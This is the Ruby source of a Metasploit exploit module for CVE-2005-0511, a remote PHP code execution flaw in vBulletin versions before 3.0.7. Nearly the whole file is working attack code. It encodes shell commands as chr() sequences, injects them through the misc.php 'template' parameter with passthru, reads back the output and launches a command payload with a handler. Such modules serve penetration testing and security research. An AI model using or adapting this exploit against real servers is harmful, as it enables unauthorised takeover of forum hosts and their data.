/modules/exploits/unix/webapp/php_vbulletin_template.rb
Ruby | 112 lines | 94 code | 13 blank | 5 comment | 9 complexity | 02c23caf07dbd7412a1fe15e9da2ba73 MD5 | raw file
- ##
- # This module requires Metasploit: http://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
- # XXX This module needs an overhaul
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'vBulletin misc.php Template Name Arbitrary Code Execution',
- 'Description' => %q{
- This module exploits an arbitrary PHP code execution flaw in
- the vBulletin web forum software. This vulnerability is only
- present when the "Add Template Name in HTML Comments" option
- is enabled. All versions of vBulletin prior to 3.0.7 are
- affected.
- },
- 'Author' =>
- [
- 'str0ke <str0ke[at]milw0rm.com>',
- 'cazz'
- ],
- 'License' => BSD_LICENSE,
- 'References' =>
- [
- [ 'CVE', '2005-0511' ],
- [ 'BID', '12622' ],
- [ 'OSVDB', '14047' ],
- ],
- 'Privileged' => false,
- 'Platform' => ['unix'],
- 'Arch' => ARCH_CMD,
- 'Payload' =>
- {
- 'Space' => 512,
- 'DisableNops' => true,
- 'Keys' => ['cmd', 'cmd_bash'],
- },
- 'Targets' => [ ['Automatic', { }], ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Feb 25 2005'
- ))
- register_options(
- [
- OptString.new('PATH', [ true, "Path to misc.php", '/forum/misc.php']),
- ], self.class)
- deregister_options(
- 'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
- )
- end
- def go(command)
- wrapper = rand_text_alphanumeric(rand(128)+32)
- command = "echo #{wrapper};#{command};echo #{wrapper};"
- encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
- res = send_request_cgi({
- 'uri' => datastore['PATH'],
- 'method' => 'GET',
- 'vars_get' =>
- {
- 'do' => "page",
- 'template' => "{${passthru(#{encoded})}}"
- }
- }, 5)
- if (res and res.body)
- b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
- if b
- return b.captures[0]
- elsif datastore['HTTP::chunked'] == true
- b = /chunked Transfer-Encoding forbidden/.match(res.body)
- if b
- fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
- end
- end
- end
- return nil
- end
- def check
- response = go("echo ownable")
- if (!response.nil? and response =~ /ownable/sm)
- return Exploit::CheckCode::Vulnerable
- end
- return Exploit::CheckCode::Safe
- end
- def exploit
- response = go(payload.encoded)
- if response == nil
- print_error('exploit failed: no response')
- else
- if response.length == 0
- print_status('exploit successful')
- else
- print_status("Command returned #{response}")
- end
- handler
- end
- end
- end